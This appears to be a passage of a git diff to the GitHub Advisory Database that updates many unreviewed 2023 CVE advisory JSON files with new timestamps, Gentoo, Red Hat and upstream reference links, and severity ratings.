b/advisories/unreviewed/2023/08/GHSA-6rcq-9f69-78p4/GHSA-6rcq-9f69-78p4.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-6rcq-9f69-78p4", - "modified": "2023-08-22T18:31:31Z", + "modified": "2024-01-31T18:31:19Z", "published": "2023-08-15T18:31:33Z", "aliases": [ "CVE-2023-4365" @@ -37,6 +37,10 @@ "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/OCFEK63FUHFXZH5MSG6TNQOXMQWM4M5S/" }, + { + "type": "WEB", + "url": "https://security.gentoo.org/glsa/202401-34" + }, { "type": "WEB", "url": "https://www.debian.org/security/2023/dsa-5479" @@ -46,7 +50,7 @@ "cwe_ids": [ ], - "severity": null, + "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2023-08-15T18:15:13Z" diff --git a/advisories/unreviewed/2023/08/GHSA-7332-j628-x48x/GHSA-7332-j628-x48x.json b/advisories/unreviewed/2023/08/GHSA-7332-j628-x48x/GHSA-7332-j628-x48x.json index 53bdb29d16eab..959210829cd52 100644 --- a/advisories/unreviewed/2023/08/GHSA-7332-j628-x48x/GHSA-7332-j628-x48x.json +++ b/advisories/unreviewed/2023/08/GHSA-7332-j628-x48x/GHSA-7332-j628-x48x.json @@ -41,6 +41,10 @@ "type": "WEB", "url": "https://security.gentoo.org/glsa/202312-07" }, + { + "type": "WEB", + "url": "https://security.gentoo.org/glsa/202401-34" + }, { "type": "WEB", "url": "https://www.debian.org/security/2023/dsa-5467" diff --git a/advisories/unreviewed/2023/08/GHSA-7h4r-wq6r-3jj6/GHSA-7h4r-wq6r-3jj6.json b/advisories/unreviewed/2023/08/GHSA-7h4r-wq6r-3jj6/GHSA-7h4r-wq6r-3jj6.json index c2cb8d1878962..e85fca9cc126d 100644 --- a/advisories/unreviewed/2023/08/GHSA-7h4r-wq6r-3jj6/GHSA-7h4r-wq6r-3jj6.json +++ b/advisories/unreviewed/2023/08/GHSA-7h4r-wq6r-3jj6/GHSA-7h4r-wq6r-3jj6.json @@ -41,6 +41,10 @@ "type": "WEB", "url": "https://security.gentoo.org/glsa/202312-07" }, + { + "type": "WEB", + "url": "https://security.gentoo.org/glsa/202401-34" + }, { "type": "WEB", "url": "https://www.debian.org/security/2023/dsa-5467" diff --git a/advisories/unreviewed/2023/08/GHSA-7qmc-g5pc-f8xj/GHSA-7qmc-g5pc-f8xj.json b/advisories/unreviewed/2023/08/GHSA-7qmc-g5pc-f8xj/GHSA-7qmc-g5pc-f8xj.json index 547b516ede914..e60215c009228 100644 --- a/advisories/unreviewed/2023/08/GHSA-7qmc-g5pc-f8xj/GHSA-7qmc-g5pc-f8xj.json +++ b/advisories/unreviewed/2023/08/GHSA-7qmc-g5pc-f8xj/GHSA-7qmc-g5pc-f8xj.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-7qmc-g5pc-f8xj", - "modified": "2023-08-21T18:31:23Z", + "modified": "2024-01-31T18:31:19Z", "published": "2023-08-15T18:31:33Z", "aliases": [ "CVE-2023-4350" @@ -37,6 +37,10 @@ "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/OCFEK63FUHFXZH5MSG6TNQOXMQWM4M5S/" }, + { + "type": "WEB", + "url": "https://security.gentoo.org/glsa/202401-34" + }, { "type": "WEB", "url": "https://www.debian.org/security/2023/dsa-5479" @@ -46,7 +50,7 @@ "cwe_ids": [ ], - "severity": null, + "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2023-08-15T18:15:11Z" diff --git a/advisories/unreviewed/2023/08/GHSA-7rfc-cwhj-x2qv/GHSA-7rfc-cwhj-x2qv.json b/advisories/unreviewed/2023/08/GHSA-7rfc-cwhj-x2qv/GHSA-7rfc-cwhj-x2qv.json index 92a079c3c8362..d6af3decc7dec 100644 --- a/advisories/unreviewed/2023/08/GHSA-7rfc-cwhj-x2qv/GHSA-7rfc-cwhj-x2qv.json +++ b/advisories/unreviewed/2023/08/GHSA-7rfc-cwhj-x2qv/GHSA-7rfc-cwhj-x2qv.json @@ -41,6 +41,10 @@ "type": "WEB", "url": "https://security.gentoo.org/glsa/202312-07" }, + { + "type": "WEB", + "url": "https://security.gentoo.org/glsa/202401-34" + }, { "type": "WEB", "url": "https://www.debian.org/security/2023/dsa-5467" diff --git a/advisories/unreviewed/2023/08/GHSA-897q-36v3-jwhm/GHSA-897q-36v3-jwhm.json b/advisories/unreviewed/2023/08/GHSA-897q-36v3-jwhm/GHSA-897q-36v3-jwhm.json index 173f43c34549e..46be075a69fbc 100644 --- a/advisories/unreviewed/2023/08/GHSA-897q-36v3-jwhm/GHSA-897q-36v3-jwhm.json +++ b/advisories/unreviewed/2023/08/GHSA-897q-36v3-jwhm/GHSA-897q-36v3-jwhm.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-897q-36v3-jwhm", - "modified": "2023-11-14T21:30:50Z", + "modified": "2024-02-08T00:32:18Z", "published": "2023-08-03T18:30:35Z", "aliases": [ "CVE-2023-4132" @@ -29,6 +29,14 @@ "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2023:7077" }, + { + "type": "WEB", + "url": "https://access.redhat.com/errata/RHSA-2024:0575" + }, + { + "type": "WEB", + "url": "https://access.redhat.com/errata/RHSA-2024:0724" + }, { "type": "WEB", "url": "https://access.redhat.com/security/cve/CVE-2023-4132" diff --git a/advisories/unreviewed/2023/08/GHSA-8m22-fr8r-4gfj/GHSA-8m22-fr8r-4gfj.json b/advisories/unreviewed/2023/08/GHSA-8m22-fr8r-4gfj/GHSA-8m22-fr8r-4gfj.json index 4a398d41ed3dd..310d30aa49afe 100644 --- a/advisories/unreviewed/2023/08/GHSA-8m22-fr8r-4gfj/GHSA-8m22-fr8r-4gfj.json +++ b/advisories/unreviewed/2023/08/GHSA-8m22-fr8r-4gfj/GHSA-8m22-fr8r-4gfj.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-8m22-fr8r-4gfj", - "modified": "2023-08-04T06:30:19Z", + "modified": "2024-01-31T18:31:18Z", "published": "2023-08-02T00:30:39Z", "aliases": [ "CVE-2023-3734" @@ -32,13 +32,17 @@ { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/PQKT7EGDD2P3L7S3NXEDDRCPK4NNZNWJ/" + }, + { + "type": "WEB", + "url": "https://security.gentoo.org/glsa/202401-34" } ], "database_specific": { "cwe_ids": [ ], - "severity": null, + "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2023-08-01T23:15:32Z" diff --git a/advisories/unreviewed/2023/08/GHSA-9j4r-qr47-rcxp/GHSA-9j4r-qr47-rcxp.json b/advisories/unreviewed/2023/08/GHSA-9j4r-qr47-rcxp/GHSA-9j4r-qr47-rcxp.json index aa3ed2340cbd2..9f8db1c8bf439 100644 --- a/advisories/unreviewed/2023/08/GHSA-9j4r-qr47-rcxp/GHSA-9j4r-qr47-rcxp.json +++ b/advisories/unreviewed/2023/08/GHSA-9j4r-qr47-rcxp/GHSA-9j4r-qr47-rcxp.json @@ -41,6 +41,10 @@ "type": "WEB", "url": "https://security.gentoo.org/glsa/202312-07" }, + { + "type": "WEB", + "url": "https://security.gentoo.org/glsa/202401-34" + }, { "type": "WEB", "url": "https://www.debian.org/security/2023/dsa-5467" diff --git a/advisories/unreviewed/2023/08/GHSA-9jfv-mpv4-v8gh/GHSA-9jfv-mpv4-v8gh.json b/advisories/unreviewed/2023/08/GHSA-9jfv-mpv4-v8gh/GHSA-9jfv-mpv4-v8gh.json index ce5d9d3f44ff1..90dd261e491a6 100644 --- a/advisories/unreviewed/2023/08/GHSA-9jfv-mpv4-v8gh/GHSA-9jfv-mpv4-v8gh.json +++ b/advisories/unreviewed/2023/08/GHSA-9jfv-mpv4-v8gh/GHSA-9jfv-mpv4-v8gh.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-9jfv-mpv4-v8gh", - "modified": "2023-08-04T06:30:19Z", + "modified": "2024-01-31T18:31:18Z", "published": "2023-08-02T00:30:39Z", "aliases": [ "CVE-2023-3736" @@ -32,13 +32,17 @@ { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/PQKT7EGDD2P3L7S3NXEDDRCPK4NNZNWJ/" + }, + { + "type": "WEB", + "url": "https://security.gentoo.org/glsa/202401-34" } ], "database_specific": { "cwe_ids": [ ], - "severity": null, + "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2023-08-01T23:15:33Z" diff --git a/advisories/unreviewed/2023/08/GHSA-9jrj-9rp7-5gh2/GHSA-9jrj-9rp7-5gh2.json b/advisories/unreviewed/2023/08/GHSA-9jrj-9rp7-5gh2/GHSA-9jrj-9rp7-5gh2.json index d9c85bf286fb0..1e867abfb9049 100644 --- a/advisories/unreviewed/2023/08/GHSA-9jrj-9rp7-5gh2/GHSA-9jrj-9rp7-5gh2.json +++ b/advisories/unreviewed/2023/08/GHSA-9jrj-9rp7-5gh2/GHSA-9jrj-9rp7-5gh2.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-9jrj-9rp7-5gh2", - "modified": "2023-08-21T21:31:23Z", + "modified": "2024-02-03T09:30:17Z", "published": "2023-08-21T21:31:23Z", "aliases": [ "CVE-2023-36787" @@ -24,13 +24,17 @@ { "type": "WEB", "url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2023-36787" + }, + { + "type": "WEB", + "url": "https://security.gentoo.org/glsa/202402-05" } ], "database_specific": { "cwe_ids": [ ], - "severity": null, + "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2023-08-21T20:15:08Z" diff --git a/advisories/unreviewed/2023/08/GHSA-9xxv-mx64-rx27/GHSA-9xxv-mx64-rx27.json b/advisories/unreviewed/2023/08/GHSA-9xxv-mx64-rx27/GHSA-9xxv-mx64-rx27.json index 507014d4d1bea..f9ff94593b66d 100644 --- a/advisories/unreviewed/2023/08/GHSA-9xxv-mx64-rx27/GHSA-9xxv-mx64-rx27.json +++ b/advisories/unreviewed/2023/08/GHSA-9xxv-mx64-rx27/GHSA-9xxv-mx64-rx27.json @@ -41,6 +41,10 @@ "type": "WEB", "url": "https://security.gentoo.org/glsa/202312-07" }, + { + "type": "WEB", + "url": "https://security.gentoo.org/glsa/202401-34" + }, { "type": "WEB", "url": "https://www.debian.org/security/2023/dsa-5467" diff --git a/advisories/unreviewed/2023/08/GHSA-c2gm-7c9h-9vpw/GHSA-c2gm-7c9h-9vpw.json b/advisories/unreviewed/2023/08/GHSA-c2gm-7c9h-9vpw/GHSA-c2gm-7c9h-9vpw.json index d19f568d06fe3..3c0d77164145c 100644 --- a/advisories/unreviewed/2023/08/GHSA-c2gm-7c9h-9vpw/GHSA-c2gm-7c9h-9vpw.json +++ b/advisories/unreviewed/2023/08/GHSA-c2gm-7c9h-9vpw/GHSA-c2gm-7c9h-9vpw.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-c2gm-7c9h-9vpw", - "modified": "2023-08-22T18:31:31Z", + "modified": "2024-01-31T18:31:19Z", "published": "2023-08-15T18:31:33Z", "aliases": [ "CVE-2023-4364" @@ -37,6 +37,10 @@ "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/OCFEK63FUHFXZH5MSG6TNQOXMQWM4M5S/" }, + { + "type": "WEB", + "url": "https://security.gentoo.org/glsa/202401-34" + }, { "type": "WEB", "url": "https://www.debian.org/security/2023/dsa-5479" @@ -46,7 +50,7 @@ "cwe_ids": [ ], - "severity": null, + "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2023-08-15T18:15:13Z" diff --git a/advisories/unreviewed/2023/08/GHSA-c774-q93c-r26f/GHSA-c774-q93c-r26f.json b/advisories/unreviewed/2023/08/GHSA-c774-q93c-r26f/GHSA-c774-q93c-r26f.json index d07924209b16e..55cf26eecc89b 100644 --- a/advisories/unreviewed/2023/08/GHSA-c774-q93c-r26f/GHSA-c774-q93c-r26f.json +++ b/advisories/unreviewed/2023/08/GHSA-c774-q93c-r26f/GHSA-c774-q93c-r26f.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-c774-q93c-r26f", - "modified": "2023-08-26T03:30:33Z", + "modified": "2024-02-03T09:30:17Z", "published": "2023-08-26T03:30:33Z", "aliases": [ "CVE-2023-36741" @@ -24,13 +24,17 @@ { "type": "WEB", "url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2023-36741" + }, + { + "type": "WEB", + "url": "https://security.gentoo.org/glsa/202402-05" } ], "database_specific": { "cwe_ids": [ ], - "severity": null, + "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2023-08-26T01:15:08Z" diff --git a/advisories/unreviewed/2023/08/GHSA-fxgf-5cm8-2f8q/GHSA-fxgf-5cm8-2f8q.json b/advisories/unreviewed/2023/08/GHSA-fxgf-5cm8-2f8q/GHSA-fxgf-5cm8-2f8q.json index be5e7a7dca368..63ffe9a8627c5 100644 --- a/advisories/unreviewed/2023/08/GHSA-fxgf-5cm8-2f8q/GHSA-fxgf-5cm8-2f8q.json +++ b/advisories/unreviewed/2023/08/GHSA-fxgf-5cm8-2f8q/GHSA-fxgf-5cm8-2f8q.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-fxgf-5cm8-2f8q", - "modified": "2023-08-04T06:30:19Z", + "modified": "2024-01-31T18:31:17Z", "published": "2023-08-02T00:30:39Z", "aliases": [ "CVE-2023-3728" @@ -32,13 +32,17 @@ { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/PQKT7EGDD2P3L7S3NXEDDRCPK4NNZNWJ/" + }, + { + "type": "WEB", + "url": "https://security.gentoo.org/glsa/202401-34" } ], "database_specific": { "cwe_ids": [ "CWE-416" ], - "severity": null, + "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2023-08-01T23:15:31Z" diff --git a/advisories/unreviewed/2023/08/GHSA-g63v-hwv9-j9q5/GHSA-g63v-hwv9-j9q5.json b/advisories/unreviewed/2023/08/GHSA-g63v-hwv9-j9q5/GHSA-g63v-hwv9-j9q5.json index 2a1e387e79c72..51617bcacfa1a 100644 --- a/advisories/unreviewed/2023/08/GHSA-g63v-hwv9-j9q5/GHSA-g63v-hwv9-j9q5.json +++ b/advisories/unreviewed/2023/08/GHSA-g63v-hwv9-j9q5/GHSA-g63v-hwv9-j9q5.json @@ -41,6 +41,10 @@ "type": "WEB", "url": "https://security.gentoo.org/glsa/202312-07" }, + { + "type": "WEB", + "url": "https://security.gentoo.org/glsa/202401-34" + }, { "type": "WEB", "url": "https://www.debian.org/security/2023/dsa-5467" diff --git a/advisories/unreviewed/2023/08/GHSA-g9wf-6ppg-937x/GHSA-g9wf-6ppg-937x.json b/advisories/unreviewed/2023/08/GHSA-g9wf-6ppg-937x/GHSA-g9wf-6ppg-937x.json index c3e2be8467858..cb2fdf496e934 100644 --- a/advisories/unreviewed/2023/08/GHSA-g9wf-6ppg-937x/GHSA-g9wf-6ppg-937x.json +++ b/advisories/unreviewed/2023/08/GHSA-g9wf-6ppg-937x/GHSA-g9wf-6ppg-937x.json @@ -41,6 +41,10 @@ "type": "WEB", "url": "https://security.gentoo.org/glsa/202312-07" }, + { + "type": "WEB", + "url": "https://security.gentoo.org/glsa/202401-34" + }, { "type": "WEB", "url": "https://www.debian.org/security/2023/dsa-5467" diff --git a/advisories/unreviewed/2023/08/GHSA-ggf2-7g57-86j8/GHSA-ggf2-7g57-86j8.json b/advisories/unreviewed/2023/08/GHSA-ggf2-7g57-86j8/GHSA-ggf2-7g57-86j8.json index 1fee89a3e1315..8bcabbb75cb2e 100644 --- a/advisories/unreviewed/2023/08/GHSA-ggf2-7g57-86j8/GHSA-ggf2-7g57-86j8.json +++ b/advisories/unreviewed/2023/08/GHSA-ggf2-7g57-86j8/GHSA-ggf2-7g57-86j8.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-ggf2-7g57-86j8", - "modified": "2023-08-22T18:31:31Z", + "modified": "2024-01-31T18:31:19Z", "published": "2023-08-15T18:31:33Z", "aliases": [ "CVE-2023-4362" @@ -37,6 +37,10 @@ "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/OCFEK63FUHFXZH5MSG6TNQOXMQWM4M5S/" }, + { + "type": "WEB", + "url": "https://security.gentoo.org/glsa/202401-34" + }, { "type": "WEB", "url": "https://www.debian.org/security/2023/dsa-5479" @@ -46,7 +50,7 @@ "cwe_ids": [ "CWE-787" ], - "severity": null, + "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2023-08-15T18:15:13Z" diff --git a/advisories/unreviewed/2023/08/GHSA-h295-rcc5-87jh/GHSA-h295-rcc5-87jh.json b/advisories/unreviewed/2023/08/GHSA-h295-rcc5-87jh/GHSA-h295-rcc5-87jh.json index e5307cdde3494..a5aef29c6b2bc 100644 --- a/advisories/unreviewed/2023/08/GHSA-h295-rcc5-87jh/GHSA-h295-rcc5-87jh.json +++ b/advisories/unreviewed/2023/08/GHSA-h295-rcc5-87jh/GHSA-h295-rcc5-87jh.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-h295-rcc5-87jh", - "modified": "2023-08-25T15:32:39Z", + "modified": "2024-01-31T18:31:19Z", "published": "2023-08-23T00:30:26Z", "aliases": [ "CVE-2023-4430" @@ -41,6 +41,10 @@ "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/KUQ7CTX3W372X3UY56VVNAHCH6H2F4X3/" }, + { + "type": "WEB", + "url": "https://security.gentoo.org/glsa/202401-34" + }, { "type": "WEB", "url": "https://www.debian.org/security/2023/dsa-5483" @@ -50,7 +54,7 @@ "cwe_ids": [ "CWE-416" ], - "severity": null, + "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2023-08-23T00:15:09Z" diff --git a/advisories/unreviewed/2023/08/GHSA-h9hg-9m55-82qp/GHSA-h9hg-9m55-82qp.json b/advisories/unreviewed/2023/08/GHSA-h9hg-9m55-82qp/GHSA-h9hg-9m55-82qp.json index 0cd9660e742e4..22cd168ee67de 100644 --- a/advisories/unreviewed/2023/08/GHSA-h9hg-9m55-82qp/GHSA-h9hg-9m55-82qp.json +++ b/advisories/unreviewed/2023/08/GHSA-h9hg-9m55-82qp/GHSA-h9hg-9m55-82qp.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-h9hg-9m55-82qp", - "modified": "2023-08-07T21:31:00Z", + "modified": "2024-01-31T18:31:19Z", "published": "2023-08-03T03:30:21Z", "aliases": [ "CVE-2023-37679" @@ -32,13 +32,17 @@ { "type": "WEB", "url": "http://nextgen.com" + }, + { + "type": "WEB", + "url": "http://packetstormsecurity.com/files/176920/Mirth-Connect-4.4.0-Remote-Command-Execution.html" } ], "database_specific": { "cwe_ids": [ "CWE-77" ], - "severity": null, + "severity": "CRITICAL", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2023-08-03T03:15:10Z" diff --git a/advisories/unreviewed/2023/08/GHSA-jjw4-gf4w-43f9/GHSA-jjw4-gf4w-43f9.json b/advisories/unreviewed/2023/08/GHSA-jjw4-gf4w-43f9/GHSA-jjw4-gf4w-43f9.json index a60531b62f790..3a141dbe0fcfe 100644 --- a/advisories/unreviewed/2023/08/GHSA-jjw4-gf4w-43f9/GHSA-jjw4-gf4w-43f9.json +++ b/advisories/unreviewed/2023/08/GHSA-jjw4-gf4w-43f9/GHSA-jjw4-gf4w-43f9.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-jjw4-gf4w-43f9", - "modified": "2023-08-05T06:30:59Z", + "modified": "2024-01-31T18:31:18Z", "published": "2023-08-02T00:30:39Z", "aliases": [ "CVE-2023-3740" @@ -32,13 +32,17 @@ { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/PQKT7EGDD2P3L7S3NXEDDRCPK4NNZNWJ/" + }, + { + "type": "WEB", + "url": "https://security.gentoo.org/glsa/202401-34" } ], "database_specific": { "cwe_ids": [ ], - "severity": null, + "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2023-08-01T23:15:33Z" diff --git a/advisories/unreviewed/2023/08/GHSA-m37v-mhqj-22cm/GHSA-m37v-mhqj-22cm.json b/advisories/unreviewed/2023/08/GHSA-m37v-mhqj-22cm/GHSA-m37v-mhqj-22cm.json index c570040fd6b6f..77845b69bd1ab 100644 --- a/advisories/unreviewed/2023/08/GHSA-m37v-mhqj-22cm/GHSA-m37v-mhqj-22cm.json +++ b/advisories/unreviewed/2023/08/GHSA-m37v-mhqj-22cm/GHSA-m37v-mhqj-22cm.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-m37v-mhqj-22cm", - "modified": "2023-08-04T06:30:19Z", + "modified": "2024-01-31T18:31:18Z", "published": "2023-08-02T00:30:39Z", "aliases": [ "CVE-2023-3735" @@ -32,13 +32,17 @@ { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/PQKT7EGDD2P3L7S3NXEDDRCPK4NNZNWJ/" + }, + { + "type": "WEB", + "url": "https://security.gentoo.org/glsa/202401-34" } ], "database_specific": { "cwe_ids": [ ], - "severity": null, + "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2023-08-01T23:15:32Z" diff --git a/advisories/unreviewed/2023/08/GHSA-m4qj-9cr4-hrw4/GHSA-m4qj-9cr4-hrw4.json b/advisories/unreviewed/2023/08/GHSA-m4qj-9cr4-hrw4/GHSA-m4qj-9cr4-hrw4.json index 823aefacb4eea..39b74b1195e38 100644 --- a/advisories/unreviewed/2023/08/GHSA-m4qj-9cr4-hrw4/GHSA-m4qj-9cr4-hrw4.json +++ b/advisories/unreviewed/2023/08/GHSA-m4qj-9cr4-hrw4/GHSA-m4qj-9cr4-hrw4.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-m4qj-9cr4-hrw4", - "modified": "2023-08-25T00:31:58Z", + "modified": "2024-01-31T00:30:16Z", "published": "2023-08-25T00:31:58Z", "aliases": [ "CVE-2023-4508" @@ -25,6 +25,10 @@ "type": "WEB", "url": "https://github.com/gerbv/gerbv/issues/191" }, + { + "type": "WEB", + "url": "https://github.com/gerbv/gerbv/commit/5517e22250e935dc7f86f64ad414aeae3dbcb36a" + }, { "type": "WEB", "url": "https://github.com/gerbv/gerbv/commit/dfb5aac533a3f9e8ccd93ca217a753258cba4fe5" @@ -42,7 +46,7 @@ "cwe_ids": [ "CWE-824" ], - "severity": null, + "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2023-08-24T23:15:09Z" diff --git a/advisories/unreviewed/2023/08/GHSA-m56x-9vph-h345/GHSA-m56x-9vph-h345.json b/advisories/unreviewed/2023/08/GHSA-m56x-9vph-h345/GHSA-m56x-9vph-h345.json index 0704daa5cc736..fca1b70f1d021 100644 --- a/advisories/unreviewed/2023/08/GHSA-m56x-9vph-h345/GHSA-m56x-9vph-h345.json +++ b/advisories/unreviewed/2023/08/GHSA-m56x-9vph-h345/GHSA-m56x-9vph-h345.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-m56x-9vph-h345", - "modified": "2023-08-25T15:32:39Z", + "modified": "2024-01-31T18:31:19Z", "published": "2023-08-23T00:30:26Z", "aliases": [ "CVE-2023-4428" @@ -41,6 +41,10 @@ "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/KUQ7CTX3W372X3UY56VVNAHCH6H2F4X3/" }, + { + "type": "WEB", + "url": "https://security.gentoo.org/glsa/202401-34" + }, { "type": "WEB", "url": "https://www.debian.org/security/2023/dsa-5483" @@ -50,7 +54,7 @@ "cwe_ids": [ "CWE-125" ], - "severity": null, + "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2023-08-23T00:15:09Z" diff --git a/advisories/unreviewed/2023/08/GHSA-m6r7-j99r-j8cp/GHSA-m6r7-j99r-j8cp.json b/advisories/unreviewed/2023/08/GHSA-m6r7-j99r-j8cp/GHSA-m6r7-j99r-j8cp.json index b0082263dec2b..48b8c8a23e692 100644 --- a/advisories/unreviewed/2023/08/GHSA-m6r7-j99r-j8cp/GHSA-m6r7-j99r-j8cp.json +++ b/advisories/unreviewed/2023/08/GHSA-m6r7-j99r-j8cp/GHSA-m6r7-j99r-j8cp.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-m6r7-j99r-j8cp", - "modified": "2023-08-04T06:30:19Z", + "modified": "2024-01-31T18:31:17Z", "published": "2023-08-02T00:30:39Z", "aliases": [ "CVE-2023-3727" @@ -32,13 +32,17 @@ { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/PQKT7EGDD2P3L7S3NXEDDRCPK4NNZNWJ/" + }, + { + "type": "WEB", + "url": "https://security.gentoo.org/glsa/202401-34" } ], "database_specific": { "cwe_ids": [ "CWE-416" ], - "severity": null, + "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2023-08-01T23:15:31Z" diff --git a/advisories/unreviewed/2023/08/GHSA-mfg8-cf72-xff4/GHSA-mfg8-cf72-xff4.json b/advisories/unreviewed/2023/08/GHSA-mfg8-cf72-xff4/GHSA-mfg8-cf72-xff4.json index 92334f071ecb4..d6794c3d3d6e7 100644 --- a/advisories/unreviewed/2023/08/GHSA-mfg8-cf72-xff4/GHSA-mfg8-cf72-xff4.json +++ b/advisories/unreviewed/2023/08/GHSA-mfg8-cf72-xff4/GHSA-mfg8-cf72-xff4.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-mfg8-cf72-xff4", - "modified": "2023-08-21T15:30:16Z", + "modified": "2024-01-31T18:31:19Z", "published": "2023-08-15T18:31:33Z", "aliases": [ "CVE-2023-4349" @@ -37,6 +37,10 @@ "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/OCFEK63FUHFXZH5MSG6TNQOXMQWM4M5S/" }, + { + "type": "WEB", + "url": "https://security.gentoo.org/glsa/202401-34" + }, { "type": "WEB", "url": "https://www.debian.org/security/2023/dsa-5479" @@ -46,7 +50,7 @@ "cwe_ids": [ "CWE-416" ], - "severity": null, + "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2023-08-15T18:15:10Z" diff --git a/advisories/unreviewed/2023/08/GHSA-mh2g-52mr-mr5v/GHSA-mh2g-52mr-mr5v.json b/advisories/unreviewed/2023/08/GHSA-mh2g-52mr-mr5v/GHSA-mh2g-52mr-mr5v.json index d1004c41bb90d..7e1ee98e49a22 100644 --- a/advisories/unreviewed/2023/08/GHSA-mh2g-52mr-mr5v/GHSA-mh2g-52mr-mr5v.json +++ b/advisories/unreviewed/2023/08/GHSA-mh2g-52mr-mr5v/GHSA-mh2g-52mr-mr5v.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-mh2g-52mr-mr5v", - "modified": "2023-08-21T18:31:23Z", + "modified": "2024-01-31T18:31:19Z", "published": "2023-08-15T18:31:33Z", "aliases": [ "CVE-2023-4351" @@ -37,6 +37,10 @@ "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/OCFEK63FUHFXZH5MSG6TNQOXMQWM4M5S/" }, + { + "type": "WEB", + "url": "https://security.gentoo.org/glsa/202401-34" + }, { "type": "WEB", "url": "https://www.debian.org/security/2023/dsa-5479" @@ -46,7 +50,7 @@ "cwe_ids": [ "CWE-416" ], - "severity": null, + "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2023-08-15T18:15:11Z" diff --git a/advisories/unreviewed/2023/08/GHSA-mjq9-8vf6-qh49/GHSA-mjq9-8vf6-qh49.json b/advisories/unreviewed/2023/08/GHSA-mjq9-8vf6-qh49/GHSA-mjq9-8vf6-qh49.json index 51f5487541ee4..f274143a7cb61 100644 --- a/advisories/unreviewed/2023/08/GHSA-mjq9-8vf6-qh49/GHSA-mjq9-8vf6-qh49.json +++ b/advisories/unreviewed/2023/08/GHSA-mjq9-8vf6-qh49/GHSA-mjq9-8vf6-qh49.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-mjq9-8vf6-qh49", - "modified": "2023-08-21T18:31:23Z", + "modified": "2024-01-31T18:31:19Z", "published": "2023-08-15T18:31:33Z", "aliases": [ "CVE-2023-4353" @@ -37,6 +37,10 @@ "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/OCFEK63FUHFXZH5MSG6TNQOXMQWM4M5S/" }, + { + "type": "WEB", + "url": "https://security.gentoo.org/glsa/202401-34" + }, { "type": "WEB", "url": "https://www.debian.org/security/2023/dsa-5479" @@ -46,7 +50,7 @@ "cwe_ids": [ "CWE-787" ], - "severity": null, + "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2023-08-15T18:15:11Z" 